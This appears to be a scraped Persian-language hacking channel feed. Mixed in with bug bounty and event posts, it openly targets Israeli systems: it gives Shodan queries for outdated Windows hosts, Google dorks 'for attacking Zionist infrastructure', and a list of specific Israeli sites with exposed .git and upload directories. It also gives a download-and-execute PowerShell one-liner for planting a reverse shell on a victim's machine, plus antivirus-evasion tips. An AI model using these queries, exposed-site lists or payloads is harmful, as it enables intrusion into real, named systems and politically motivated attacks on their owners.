https://www.shodan.io/search?query=country%3A%22IL%22+os%3A%22Windows+Server+2012+R2+%28build+6.3.9600%29%22
windows server 2012 r2

https://www.shodan.io/search?query=country%3A%22IL%22+os%3A%22Windows+7%22

windows 7

https://www.shodan.io/search?query=country%3A%22IL%22+os%3A%22Windows+5.1%22
windows xp

تارگتا همه اسرائیلین

https://www.shodan.io/search?query=country%3A%22IL%22+os%3A%22Windows+Server+%28R%29+2008+Standard+6003+Service+Pack+2%22


https://www.shodan.io/search?query=country%3A%22IL%22+os%3A%22Windows+Server+2008+R2+Foundation%22

windows server 2008

خب بالاخره به رنک 1 باگ بانتی ستون رسیدم😅

https://bugbounty.sotoon.ir/app/leaderboard/list

سلام بچه ها
میخوام دوره جدید رکورد کنم بین دو موضوع موندم

زیر کامنتا اعلام کنید بهم

1. Api Security
2. Recon tools

CS491
cobalt strike
یکی از ابزار های بشدت قدرتمند در حوزه رد تیم که نیازه🔥

shodan dorks for recon :

1. ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"

2. ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"

3. ssl.cert.subject.CN:"*. target.com" http.noscript:"gitlab"

4. ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"

5. ssl.cert.subject.CN:"*. target.com" +200 http.noscript:"Admin"

آسیب پذیری جدید از دیوار که بابتش 50 میلیون بانتی دادن رایتاپش نوشته شد⭐️

https://x.com/matinnouryan/status/1834233501459038718?s=46

چی میشه اگر یه برنامه نویس فولدر .git رو داخل هاست اپلود کنه؟

در ویدیو زیر به برسی دایرکتوری .git و نحوه اکسپلویت کردن این دایرکتوری میپردازیم.

در بحث بالا بردن اهمیت این آسیب پذیری در باگ بانتی
و یا برسی کردنشیال ها یا … در عملیات های رد تیم


https://youtu.be/nQp0Me4tTEU?si=C4fG3F0xF8bfFde8

گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون:
میتونین خودتون تغیراتی ایجاد کنید👍

site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=

site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"

site:*.il inurl:news.php?id=
site:*.il "index of /"

http://tzafrir.org.il/~tzafrir/git_test/.git/

https://apache.co.il/zzz/

https://www.flutedoc.co.il/

https://pdf.melumad.co.il/

https://flashner.co.il/~efraim/

https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f

https://asidesign.co.il/wp-content/uploads/

https://tuticafe.co.il/wp-content/uploads/

با یدونه از گوگل دورک های بالا ریختن بیرون

با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید:

https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1

کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.

مراحل اجرا:‌‌
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.

2. حالا با استفاده از یک پیلود مثل

iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.

دسترسی برقرار میشود!💣

نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍

دیشب روی ویندور 10 کامل تست شده و کار میکنه🤙
ممکنه در آنتی ویروس های آپدیت کمی مشکل داشته باشه, با ایجاد تایم بالا و کمی بازی مموری میتونید اون روهم بایپس کنید!

💻 هک سیستم عامل ویندوز با فایل word

⚙️ از اسکریپت های پست بالا داخل ویدیو استفاده کردم

@matitanium

باگ پارتی 2024
پارک علم و فناوری پردیس
Cybersecurity event 2024

تو این سایت می‌تونید مقالاتِ پولیِ مدیوم رو رایگان باز کنید. در واقع خودش اشتراکِ مدیوم خریده و از طریقِ این سایت در دسترسِ عموم قرار داده.

@matitanium

مراسم اختتامیه هکر های دوست داشتنی 2024

@matitanium